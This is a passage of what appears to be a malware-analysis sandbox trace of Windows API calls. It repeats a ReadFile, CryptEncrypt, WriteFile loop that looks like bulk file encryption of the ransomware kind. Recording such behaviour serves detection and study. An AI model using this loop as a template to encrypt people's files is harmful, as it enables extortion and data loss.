pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.149] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.149] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.150] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.150] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.150] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.150] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.150] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.150] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.151] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.151] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.151] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.151] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.151] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.151] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.151] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.152] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.152] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.152] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.152] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.152] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.152] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.153] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.153] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.153] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.153] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.153] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.154] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.154] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.154] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.154] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.154] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.154] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.155] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.155] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.155] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.155] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.155] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.155] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.155] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.156] ReadFile (in: 